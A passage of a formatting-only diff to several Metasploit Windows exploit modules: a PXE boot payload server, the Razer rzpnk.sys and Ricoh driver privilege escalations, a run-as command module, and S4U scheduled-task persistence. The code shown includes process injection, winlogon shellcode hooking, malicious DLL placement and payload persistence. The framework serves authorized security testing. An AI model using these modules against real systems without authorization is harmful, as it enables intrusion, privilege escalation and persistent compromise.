-        'LHOST' => datastore['LHOST'],
-        'LPORT' => datastore['LPORT'],
-        'EXITFUNC' => 'thread',
-        'BufferRegister' => 'EAX'
-      },
+         'LHOST' => datastore['LHOST'],
+         'LPORT' => datastore['LPORT'],
+         'EXITFUNC' => 'thread',
+         'BufferRegister' => 'EAX'
+       },
     )
 
     # To ensure compatibility out payload should be US-ASCII
@@ -165,17 +164,16 @@ class MetasploitModule < Msf::Exploit::Local
   def remove_dyn_service(file_path)
     service_stop(datastore['SVC_NAME'])
     if service_delete(datastore['SVC_NAME'])['GetLastError'] == 0
-      vprint_good("Service #{datastore['SVC_NAME']} Removed, deleting #{file_path.gsub('\\','\\\\')}")
-      session.fs.file.rm(file_path.gsub('\\','\\\\'))
+      vprint_good("Service #{datastore['SVC_NAME']} Removed, deleting #{file_path.gsub('\\', '\\\\')}")
+      session.fs.file.rm(file_path.gsub('\\', '\\\\'))
     else
-      print_error("Something went wrong, not deleting #{file_path.gsub('\\','\\\\')}")
+      print_error("Something went wrong, not deleting #{file_path.gsub('\\', '\\\\')}")
     end
     return
   end
 
   def install_dyn_service(file_path)
-
-    service_create(datastore['SVC_NAME'], datastore['SVC_DNAME'], file_path.gsub('\\','\\\\'), startup=2, server=nil)
+    service_create(datastore['SVC_NAME'], datastore['SVC_DNAME'], file_path.gsub('\\', '\\\\'), startup = 2, server = nil)
     if service_start(datastore['SVC_NAME']).to_i == 0
       vprint_good("Service Binary #{file_path} Started")
     end

--- a/modules/exploits/windows/local/pxeexploit.rb
+++ b/modules/exploits/windows/local/pxeexploit.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -12,8 +11,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize
     super(
-      'Name'        => 'PXE Exploit Server',
-      'Description'    => %q{
+      'Name' => 'PXE Exploit Server',
+      'Description' => %q{
         This module provides a PXE server, running a DHCP and TFTP server.
         The default configuration loads a linux kernel and initrd into memory that
         reads the hard drive; placing the payload on the hard drive of any Windows
@@ -22,57 +21,59 @@ class MetasploitModule < Msf::Exploit::Remote
         Note: the displayed IP address of a target is the address this DHCP server
         handed out, not the "normal" IP address the host uses.
       },
-      'Author'      => [ 'scriptjunkie' ],
-      'License'     => MSF_LICENSE,
-      'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'thread',
-          'FILENAME' => 'update1',
-          'SERVEONCE' => true # once they reboot; don't infect again - you'll kill them!
-        },
-      'Payload'        =>
-        {
-          'Space'       => 4500,
-          'DisableNops' => 'True',
-        },
-      'Platform'       => 'win',
+      'Author' => [ 'scriptjunkie' ],
+      'License' => MSF_LICENSE,
+      'DefaultOptions' => {
+        'EXITFUNC' => 'thread',
+        'FILENAME' => 'update1',
+        'SERVEONCE' => true # once they reboot; don't infect again - you'll kill them!
+      },
+      'Payload' => {
+        'Space' => 4500,
+        'DisableNops' => 'True',
+      },
+      'Platform' => 'win',
       'DisclosureDate' => 'Aug 05 2011',
-      'Targets'        =>
+      'Targets' => [
         [
-          [ 'Windows Universal',
-            {
-            }
-          ],
+          'Windows Universal',
+          {
+          }
         ],
-      'Privileged'     => true,
+      ],
+      'Privileged' => true,
       'Stance' => Msf::Exploit::Stance::Passive,
-      'DefaultTarget'  => 0
+      'DefaultTarget' => 0
     )
 
     register_options(
       [
-        OptInt.new('SESSION',   [ false,  'A session to pivot the attack through' ])
-      ])
+        OptInt.new('SESSION', [ false, 'A session to pivot the attack through' ])
+      ]
+    )
 
     register_advanced_options(
       [
-        OptString.new('TFTPROOT',   [ false,  'The TFTP root directory to serve files from',
-          File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')]),
-        OptString.new('SRVHOST',   [ false,  'The IP of the DHCP server' ]),
-        OptString.new('NETMASK',   [ false,  'The netmask of the local subnet', '255.255.255.0' ]),
-        OptBool.new('RESETPXE',   [ true,  'Resets the server to re-exploit already targeted hosts', false ]),
-        OptString.new('DHCPIPSTART',   [ false,  'The first IP to give out' ]),
-        OptString.new('DHCPIPEND',   [ false,  'The last IP to give out' ])
-      ])
+        OptString.new('TFTPROOT', [
+          false, 'The TFTP root directory to serve files from',
+          File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')
+        ]),
+        OptString.new('SRVHOST', [ false, 'The IP of the DHCP server' ]),
+        OptString.new('NETMASK', [ false, 'The netmask of the local subnet', '255.255.255.0' ]),
+        OptBool.new('RESETPXE', [ true, 'Resets the server to re-exploit already targeted hosts', false ]),
+        OptString.new('DHCPIPSTART', [ false, 'The first IP to give out' ]),
+        OptString.new('DHCPIPEND', [ false, 'The last IP to give out' ])
+      ]
+    )
   end
 
   def exploit
     # Prepare payload
     print_status("Creating initrd")
-    initrd = IO.read(File.join(Msf::Config.data_directory, 'exploits', 'pxexploit','updatecustom'))
+    initrd = IO.read(File.join(Msf::Config.data_directory, 'exploits', 'pxexploit', 'updatecustom'))
     uncompressed = Rex::Text.ungzip(initrd)
     payl = payload.generate
-    uncompressed[uncompressed.index('AAAAAAAAAAAAAAAAAAAAAA'),payl.length] = payl
+    uncompressed[uncompressed.index('AAAAAAAAAAAAAAAAAAAAAA'), payl.length] = payl
     initrd = Rex::Text.gzip(uncompressed)
 
     # Meterpreter attack
@@ -91,13 +92,13 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Loading DHCP options...")
       client.lanattacks.dhcp.load_options(datastore)
       0.upto(4) do |i|
-        print_status("Loading file #{i+1} of 5")
+        print_status("Loading file #{i + 1} of 5")
         if i < 4
-          contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
+          contents = IO.read(::File.join(datastore['TFTPROOT'], "update#{i}"))
         else
           contents = initrd
         end
-        client.lanattacks.tftp.add_file("update#{i}",contents)
+        client.lanattacks.tftp.add_file("update#{i}", contents)
       end
       print_status("Starting TFTP server...")
       client.lanattacks.tftp.start
@@ -109,7 +110,7 @@ class MetasploitModule < Msf::Exploit::Remote
           # get stats every 20s
           select(nil, nil, nil, 20)
           client.lanattacks.dhcp.log.each do |item|
-            print_status("Served PXE attack to #{item[0].unpack('H2H2H2H2H2H2').join(':')} "+
+            print_status("Served PXE attack to #{item[0].unpack('H2H2H2H2H2H2').join(':')} " +
                 "(#{Rex::Socket.addr_ntoa(item[1])})")
             report_note({
               :type => 'PXE.client',
@@ -131,13 +132,13 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Starting TFTP server...")
     @tftp = Rex::Proto::TFTP::Server.new
     @tftp.set_tftproot(datastore['TFTPROOT'])
-    @tftp.register_file('update4',initrd)
+    @tftp.register_file('update4', initrd)
     @tftp.start
 
     print_status("Starting DHCP server...")
-    @dhcp = Rex::Proto::DHCP::Server.new( datastore )
+    @dhcp = Rex::Proto::DHCP::Server.new(datastore)
     @dhcp.report do |mac, ip|
-      print_status("Serving PXE attack to #{mac.unpack('H2H2H2H2H2H2').join(':')} "+
+      print_status("Serving PXE attack to #{mac.unpack('H2H2H2H2H2H2').join(':')} " +
           "(#{Rex::Socket.addr_ntoa(ip)})")
       report_note({
         :type => 'PXE.client',

--- a/modules/exploits/windows/local/razer_zwopenprocess.rb
+++ b/modules/exploits/windows/local/razer_zwopenprocess.rb
@@ -16,63 +16,63 @@ class MetasploitModule < Msf::Exploit::Remote
   HOOK_STUB_MAX_LENGTH = 256
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Razer Synapse rzpnk.sys ZwOpenProcess',
-      'Description'    => %q{
-        A vulnerability exists in the latest version of Razer Synapse
-        (v2.20.15.1104 as of the day of disclosure) which can be leveraged
-        locally by a malicious application to elevate its privileges to those of
-        NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler
-        in the rzpnk.sys driver that passes a PID specified by the user to
-        ZwOpenProcess. This can be issued by an application to open a handle to
-        an arbitrary process with the necessary privileges to allocate, read and
-        write memory in the specified process.
+    super(
+      update_info(
+        info,
+        'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess',
+        'Description' => %q{
+          A vulnerability exists in the latest version of Razer Synapse
+          (v2.20.15.1104 as of the day of disclosure) which can be leveraged
+          locally by a malicious application to elevate its privileges to those of
+          NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler
+          in the rzpnk.sys driver that passes a PID specified by the user to
+          ZwOpenProcess. This can be issued by an application to open a handle to
+          an arbitrary process with the necessary privileges to allocate, read and
+          write memory in the specified process.
 
-        This exploit leverages this vulnerability to open a handle to the
-        winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by
-        installing a hook to execute attacker controlled shellcode. This hook is
-        then triggered on demand by calling user32!LockWorkStation(), resulting
-        in the attacker's payload being executed with the privileges of the
-        infected winlogon process. In order for the issued IOCTL to work, the
-        RazerIngameEngine.exe process must not be running. This exploit will
-        check if it is, and attempt to kill it as necessary.
+          This exploit leverages this vulnerability to open a handle to the
+          winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by
+          installing a hook to execute attacker controlled shellcode. This hook is
+          then triggered on demand by calling user32!LockWorkStation(), resulting
+          in the attacker's payload being executed with the privileges of the
+          infected winlogon process. In order for the issued IOCTL to work, the
+          RazerIngameEngine.exe process must not be running. This exploit will
+          check if it is, and attempt to kill it as necessary.
 
-        The vulnerable software can be found here:
-        https://www.razerzone.com/synapse/. No Razer hardware needs to be
-        connected in order to leverage this vulnerability.
+          The vulnerable software can be found here:
+          https://www.razerzone.com/synapse/. No Razer hardware needs to be
+          connected in order to leverage this vulnerability.
 
-        This exploit is not opsec-safe due to the user being logged out as part
-        of the exploitation process.
-      },
-      'Author'         => 'Spencer McIntyre',
-      'License'        => MSF_LICENSE,
-      'References'     => [
-        ['CVE', '2017-9769'],
-        ['URL', 'https://warroom.securestate.com/cve-2017-9769/']
-      ],
-      'Platform'       => 'win',
-      'Targets'        =>
-        [
+          This exploit is not opsec-safe due to the user being logged out as part
+          of the exploitation process.
+        },
+        'Author' => 'Spencer McIntyre',
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2017-9769'],
+          ['URL', 'https://warroom.securestate.com/cve-2017-9769/']
+        ],
+        'Platform' => 'win',
+        'Targets' => [
           # Tested on (64 bits):
           # * Windows 7 SP1
           # * Windows 10.0.10586
           [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
         ],
-      'DefaultOptions' =>
-        {
-          'EXITFUNC'   => 'thread',
-          'WfsDelay'   => 20
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread',
+          'WfsDelay' => 20
         },
-      'DefaultTarget'  => 0,
-      'Privileged'     => true,
-      'DisclosureDate' => '2017-03-22',
-      'Notes'          =>
-        {
-          'Stability'   => [ CRASH_SERVICE_RESTARTS ],
+        'DefaultTarget' => 0,
+        'Privileged' => true,
+        'DisclosureDate' => '2017-03-22',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_RESTARTS ],
           'SideEffects' => [ SCREEN_EFFECTS ],
           'Reliability' => [ REPEATABLE_SESSION ],
         },
-      ))
+      )
+    )
   end
 
   def check
@@ -137,13 +137,13 @@ class MetasploitModule < Msf::Exploit::Remote
     user32_handle = result['return']
 
     # resolve and backup the functions that we'll install trampolines in
-    user32_trampolines = {}  # address => original chunk
+    user32_trampolines = {} # address => original chunk
     user32_functions = ['LockWindowStation']
     user32_functions.each do |function|
       address = get_address(user32_handle, function)
       winlogon.memory.protect(address)
       user32_trampolines[function] = {
-        address:  address,
+        address: address,
         original: winlogon.memory.read(address, 24)
       }
     end
@@ -184,24 +184,26 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_handle(pid)
     handle = open_device("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
     return nil unless handle
+
     vprint_status('Successfully opened a handle to the driver')
 
     buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')
 
-    session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[
-      ['DWORD',  'FileHandle',         'in' ],
-      ['DWORD',  'Event',              'in' ],
-      ['LPVOID', 'ApcRoutine',         'in' ],
-      ['LPVOID', 'ApcContext',         'in' ],
-      ['PDWORD', 'IoStatusBlock',      'out'],
-      ['DWORD',  'IoControlCode',      'in' ],
-      ['PBLOB',  'InputBuffer',        'in' ],
-      ['DWORD',  'InputBufferLength',  'in' ],
-      ['PBLOB',  'OutputBuffer',       'out'],
-      ['DWORD',  'OutputBufferLength', 'in' ],
+    session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD', [
+      ['DWORD', 'FileHandle', 'in' ],
+      ['DWORD', 'Event', 'in' ],
+      ['LPVOID', 'ApcRoutine', 'in' ],
+      ['LPVOID', 'ApcContext', 'in' ],
+      ['PDWORD', 'IoStatusBlock', 'out'],
+      ['DWORD', 'IoControlCode', 'in' ],
+      ['PBLOB', 'InputBuffer', 'in' ],
+      ['DWORD', 'InputBufferLength', 'in' ],
+      ['PBLOB', 'OutputBuffer', 'out'],
+      ['DWORD', 'OutputBufferLength', 'in' ],
     ])
     result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length)
     return nil if result['return'] != 0
+
     session.railgun.kernel32.CloseHandle(handle)
 
     result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1]
@@ -210,6 +212,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def get_hook(shellcode_address, restore)
     dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return']
     return nil if dll_handle == 0
+
     create_thread_address = get_address(dll_handle, 'CreateThread')
 
     stub = %{

--- a/modules/exploits/windows/local/ricoh_driver_privesc.rb
+++ b/modules/exploits/windows/local/ricoh_driver_privesc.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
 
@@ -14,58 +13,59 @@ class MetasploitModule < Msf::Exploit::Local
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Ricoh Driver Privilege Escalation',
-      'Description'    => %q(
-        Various Ricoh printer drivers allow escalation of
-        privileges on Windows systems.
+    super(
+      update_info(
+        info,
+        'Name' => 'Ricoh Driver Privilege Escalation',
+        'Description' => %q{
+          Various Ricoh printer drivers allow escalation of
+          privileges on Windows systems.
 
-        For vulnerable drivers, a low-privileged user can
-        read/write files within the `RICOH_DRV` directory
-        and its subdirectories.
+          For vulnerable drivers, a low-privileged user can
+          read/write files within the `RICOH_DRV` directory
+          and its subdirectories.
 
-        `PrintIsolationHost.exe`, a Windows process running
-        as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
-        during the installation of a printer. A user can
-        elevate to SYSTEM by writing a malicious DLL to
-        the vulnerable driver directory and adding a new
-        printer with a vulnerable driver.
+          `PrintIsolationHost.exe`, a Windows process running
+          as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
+          during the installation of a printer. A user can
+          elevate to SYSTEM by writing a malicious DLL to
+          the vulnerable driver directory and adding a new
+          printer with a vulnerable driver.
 
-        This module leverages the `prnmngr.vbs` script
-        to add and delete printers. Multiple runs of this
-        module may be required given successful exploitation
-        is time-sensitive.
-      ),
-      'License'        => MSF_LICENSE,
-      'Author'         => [
-                            'Alexander Pudwill',  # discovery & PoC
-                            'Pentagrid AG',       # PoC
-                            'Shelby Pace'         # msf module
-                          ],
-      'References'     =>
-        [
+          This module leverages the `prnmngr.vbs` script
+          to add and delete printers. Multiple runs of this
+          module may be required given successful exploitation
+          is time-sensitive.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Alexander Pudwill', # discovery & PoC
+          'Pentagrid AG',       # PoC
+          'Shelby Pace'         # msf module
+        ],
+        'References' => [
           [ 'CVE', '2019-19363'],
           [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
         ],
-      'Arch'           => [ ARCH_X86, ARCH_X64 ],
-      'Platform'       => 'win',
-      'Payload'        =>
-      {
-      },
-      'SessionTypes'   => [ 'meterpreter' ],
-      'Targets'        =>
-        [[
-            'Windows', { 'Arch'  => [ ARCH_X86, ARCH_X64 ] }
-        ]],
-      'Notes'          =>
-      {
-        'SideEffects' =>  [ ARTIFACTS_ON_DISK ],
-        'Reliability' =>  [ UNRELIABLE_SESSION ],
-        'Stability'   =>  [ SERVICE_RESOURCE_LOSS ]
-      },
-      'DisclosureDate' => '2020-01-22',
-      'DefaultTarget'  => 0
-    ))
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Platform' => 'win',
+        'Payload' => {
+        },
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' => [
+          [
+            'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
+          ]
+        ],
+        'Notes' => {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ SERVICE_RESOURCE_LOSS ]
+        },
+        'DisclosureDate' => '2020-01-22',
+        'DefaultTarget' => 0
+      )
+    )
 
     self.needs_cleanup = true
   end
@@ -75,6 +75,7 @@ class MetasploitModule < Msf::Exploit::Local
     dir_name = "C:\\ProgramData\\RICOH_DRV"
 
     return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)
+
     driver_names = dir(dir_name)
 
     return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length
@@ -83,6 +84,7 @@ class MetasploitModule < Msf::Exploit::Local
     driver_names.each do |driver_name|
       full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz"
       next unless directory?(full_path)
+
       @driver_path = full_path
 
       res = cmd_exec("icacls \"#{@driver_path}\"")

--- a/modules/exploits/windows/local/run_as.rb
+++ b/modules/exploits/windows/local/run_as.rb
@@ -9,32 +9,34 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'                 => "Windows Run Command As User",
-      'Description'          => %q{
-        This module will login with the specified username/password and execute the
-        supplied command as a hidden process. Output is not returned by default.
-        Unless targeting a local user either set the DOMAIN, or specify a UPN user
-        format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function.
+    super(
+      update_info(
+        info,
+        'Name' => "Windows Run Command As User",
+        'Description' => %q{
+          This module will login with the specified username/password and execute the
+          supplied command as a hidden process. Output is not returned by default.
+          Unless targeting a local user either set the DOMAIN, or specify a UPN user
+          format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function.
 
-        A custom command line can be sent instead of uploading an executable.
-        APPLICAITON_NAME and COMMAND_LINE are passed to lpApplicationName and lpCommandLine
-        respectively. See the MSDN documentation for how these two values interact.
-      },
-      'License'              => MSF_LICENSE,
-      'Platform'             => ['win'],
-      'SessionTypes'         => ['meterpreter'],
-      'Author'               => ['Kx499', 'Ben Campbell'],
-      'Targets'              => [
-        [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
-      ],
-      'DefaultTarget'        => 0,
-      'References'           =>
-        [
+          A custom command line can be sent instead of uploading an executable.
+          APPLICAITON_NAME and COMMAND_LINE are passed to lpApplicationName and lpCommandLine
+          respectively. See the MSDN documentation for how these two values interact.
+        },
+        'License' => MSF_LICENSE,
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Author' => ['Kx499', 'Ben Campbell'],
+        'Targets' => [
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
+        ],
+        'DefaultTarget' => 0,
+        'References' => [
           [ 'URL', 'https://msdn.microsoft.com/en-us/library/windows/desktop/ms682431' ]
         ],
-      'DisclosureDate' => '1999-01-01' # Same as psexec -- a placeholder date for non-vuln 'exploits'
-    ))
+        'DisclosureDate' => '1999-01-01'
+      )
+    ) # Same as psexec -- a placeholder date for non-vuln 'exploits'
 
     register_options(
       [
@@ -44,7 +46,8 @@ class MetasploitModule < Msf::Exploit::Local
         OptString.new('APPLICATION_NAME', [false, 'Application to be executed (lpApplicationName)', nil ]),
         OptString.new('COMMAND_LINE', [false, 'Command line to execute (lpCommandLine)', nil ]),
         OptBool.new('USE_CUSTOM_COMMAND', [true, 'Specify custom APPLICATION_NAME and COMMAND_LINE', false ])
-      ])
+      ]
+    )
   end
 
   def exploit
@@ -95,21 +98,21 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::Unknown, "Unable to allocate memory in target process: #{virtual_alloc['ErrorMessage']}") if address == 0
 
       write_memory = session.railgun.kernel32.WriteProcessMemory(process_handle,
-                                                                address,
-                                                                raw,
-                                                                raw.length,
-                                                                4)
+                                                                 address,
+                                                                 raw,
+                                                                 raw.length,
+                                                                 4)
 
       fail_with(Failure::Unknown,
                 "Unable to write memory in target process @ 0x#{address.to_s(16)}: #{write_memory['ErrorMessage']}") unless write_memory['return']
 
       create_remote_thread = session.railgun.kernel32.CreateRemoteThread(process_handle,
-                                                                        nil,
-                                                                        0,
-                                                                        address,
-                                                                        nil,
-                                                                        0,
-                                                                        4)
+                                                                         nil,
+                                                                         0,
+                                                                         address,
+                                                                         nil,
+                                                                         0,
+                                                                         4)
       if create_remote_thread['return'] == 0
         print_error("Unable to create remote thread in target process: #{create_remote_thread['ErrorMessage']}")
       else

--- a/modules/exploits/windows/local/s4u_persistence.rb
+++ b/modules/exploits/windows/local/s4u_persistence.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
@@ -11,49 +10,53 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Exploit::EXE
 
-  def initialize(info={})
-    super( update_info( info,
-      'Name'          => 'Windows Manage User Level Persistent Payload Installer',
-      'Description'   => %q{
-        Creates a scheduled task that will run using service-for-user (S4U).
-        This allows the scheduled task to run even as an unprivileged user
-        that is not logged into the device. This will result in lower security
-        context, allowing access to local resources only. The module
-        requires 'Logon as a batch job' permissions (SeBatchLogonRight).
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        =>
-        [
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Manage User Level Persistent Payload Installer',
+        'Description' => %q{
+          Creates a scheduled task that will run using service-for-user (S4U).
+          This allows the scheduled task to run even as an unprivileged user
+          that is not logged into the device. This will result in lower security
+          context, allowing access to local resources only. The module
+          requires 'Logon as a batch job' permissions (SeBatchLogonRight).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Thomas McCarthy "smilingraccoon" <smilingraccoon[at]gmail.com>',
           'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
         ],
-      'Platform'      => 'win',
-      'SessionTypes'  => [ 'meterpreter' ],
-      'Targets'       => [ [ 'Windows', {} ] ],
-      'DisclosureDate' => '2013-01-02', # Date of scriptjunkie's blog post
-      'DefaultTarget' => 0,
-      'References'     => [
-        [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/' ],
-        [ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/' ]
-      ]
-    ))
+        'Platform' => 'win',
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' => [ [ 'Windows', {} ] ],
+        'DisclosureDate' => '2013-01-02', # Date of scriptjunkie's blog post
+        'DefaultTarget' => 0,
+        'References' => [
+          [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/' ],
+          [ 'URL', 'http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/' ]
+        ]
+      )
+    )
 
     register_options(
       [
         OptInt.new('FREQUENCY', [false, 'Schedule trigger: Frequency in minutes to execute']),
         OptInt.new('EXPIRE_TIME', [false, 'Number of minutes until trigger expires', 0]),
-        OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule',['event', 'lock', 'logon', 'schedule', 'unlock']]),
+        OptEnum.new('TRIGGER', [true, 'Payload trigger method', 'schedule', ['event', 'lock', 'logon', 'schedule', 'unlock']]),
         OptString.new('REXENAME', [false, 'Name of exe on remote system']),
         OptString.new('RTASKNAME', [false, 'Name of task on remote system']),
         OptString.new('PATH', [false, 'PATH to write payload', '%TEMP%'])
-      ])
+      ]
+    )
 
     register_advanced_options(
       [
         OptString.new('EVENT_LOG', [false, 'Event trigger: The event log to check for event']),
         OptInt.new('EVENT_ID', [false, 'Event trigger: Event ID to trigger on.']),
         OptString.new('XPATH', [false, 'XPath query'])
-      ])
+      ]
+    )
   end
 
   def exploit
@@ -75,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Local
     rexename = generate_rexename
 
     # Generate path names
-    xml_path,rexe_path = generate_path(rexename)
+    xml_path, rexe_path = generate_path(rexename)
 
     # Upload REXE to victim fs
     upload_rexe(rexe_path, payload)
@@ -90,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Local
     write_xml(xml, xml_path, rexe_path)
 
     # Name task with Opt or give random name
-    schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    schname = datastore['RTASKNAME'] || Rex::Text.rand_text_alpha((rand(8) + 6))
 
     # Create task with modified XML
     create_task(xml_path, schname, rexe_path)
@@ -100,7 +103,7 @@ class MetasploitModule < Msf::Exploit::Local
   # Generate name for payload
   # Returns name
   def generate_rexename
-    rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+    rexename = datastore['REXENAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + ".exe"
     if not rexename =~ /\.exe$/
       print_warning("#{datastore['REXENAME']} isn't an exe")
     end
@@ -113,9 +116,9 @@ class MetasploitModule < Msf::Exploit::Local
   def generate_path(rexename)
     # Generate a path to write payload and XML
     path = datastore['PATH'] || session.sys.config.getenv('TEMP')
-    xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}.xml"
+    xml_path = "#{path}\\#{Rex::Text.rand_text_alpha((rand(8) + 6))}.xml"
     rexe_path = "#{path}\\#{rexename}"
-    return xml_path,rexe_path
+    return xml_path, rexe_path
   end
 
   ##############################################################
@@ -142,7 +145,7 @@ class MetasploitModule < Msf::Exploit::Local
   # Returns normal XML for generic task
   def create_xml(rexe_path)
     xml_path = File.join(Msf::Config.data_directory, "exploits", "s4u_persistence.xml")
-    xml_file = File.new(xml_path,"r")
+    xml_file = File.new(xml_path, "r")
     xml = xml_file.read
     xml_file.close
 
@@ -150,7 +153,7 @@ class MetasploitModule < Msf::Exploit::Local
     begin
       vt = client.railgun.kernel32.GetLocalTime(32)
       ut = vt['lpSystemTime'].unpack("v*")
-      t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5])
+      t = ::Time.utc(ut[0], ut[1], ut[3], ut[4], ut[5])
     rescue
       print_warning("Could not read system time from victim... Using your local time to determine creation date")
       t = ::Time.now
@@ -178,47 +181,47 @@ class MetasploitModule < Msf::Exploit::Local
   def add_xml_triggers(xml)
     # Insert trigger
     case datastore['TRIGGER']
-      when 'logon'
-        # Trigger based on winlogon event, checks windows license key after logon
-        print_status("This trigger triggers on event 4101 which validates the Windows license")
-        line = "*[System[EventID='4101']] and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]"
-        xml = create_trigger_event_tags("Application", line, xml)
+    when 'logon'
+      # Trigger based on winlogon event, checks windows license key after logon
+      print_status("This trigger triggers on event 4101 which validates the Windows license")
+      line = "*[System[EventID='4101']] and *[System[Provider[@Name='Microsoft-Windows-Winlogon']]]"
+      xml = create_trigger_event_tags("Application", line, xml)
 
-      when 'lock'
-        xml = create_trigger_tags("SessionLock", xml)
+    when 'lock'
+      xml = create_trigger_tags("SessionLock", xml)
 
-      when 'unlock'
-        xml = create_trigger_tags("SessionUnlock", xml)
+    when 'unlock'
+      xml = create_trigger_tags("SessionUnlock", xml)
 
-      when 'event'
-        line = "*[System[(EventID=#{datastore['EVENT_ID']})]]"
-        if not datastore['XPATH'].nil? and not datastore['XPATH'].empty?
-          # Append xpath queries
-          line << " and #{datastore['XPATH']}"
-          # Print XPath query, useful to user to spot issues with uncommented single quotes
-          print_status("XPath query: #{line}")
-        end
+    when 'event'
+      line = "*[System[(EventID=#{datastore['EVENT_ID']})]]"
+      if not datastore['XPATH'].nil? and not datastore['XPATH'].empty?
+        # Append xpath queries
+        line << " and #{datastore['XPATH']}"
+        # Print XPath query, useful to user to spot issues with uncommented single quotes
+        print_status("XPath query: #{line}")
+      end
 
-        xml = create_trigger_event_tags(datastore['EVENT_LOG'], line, xml)
+      xml = create_trigger_event_tags(datastore['EVENT_LOG'], line, xml)
 
-      when 'schedule'
-        # Change interval tag, insert into XML
-        if datastore['FREQUENCY'] != 0
-          minutes = datastore['FREQUENCY']
-        else
-          print_status("Defaulting frequency to every hour")
-          minutes = 60
-        end
-        xml = xml.sub(/<Interval>.*?</, "<Interval>PT#{minutes}M<")
+    when 'schedule'
+      # Change interval tag, insert into XML
+      if datastore['FREQUENCY'] != 0
+        minutes = datastore['FREQUENCY']
+      else
+        print_status("Defaulting frequency to every hour")
+        minutes = 60
+      end
+      xml = xml.sub(/<Interval>.*?</, "<Interval>PT#{minutes}M<")
 
-        # Insert expire tag if not 0
-        unless datastore['EXPIRE_TIME'] == 0
-          # Generate expire tag
-          end_boundary = create_expire_tag
-          # Inject expire tag
-          insert = xml.index("</StartBoundary>")
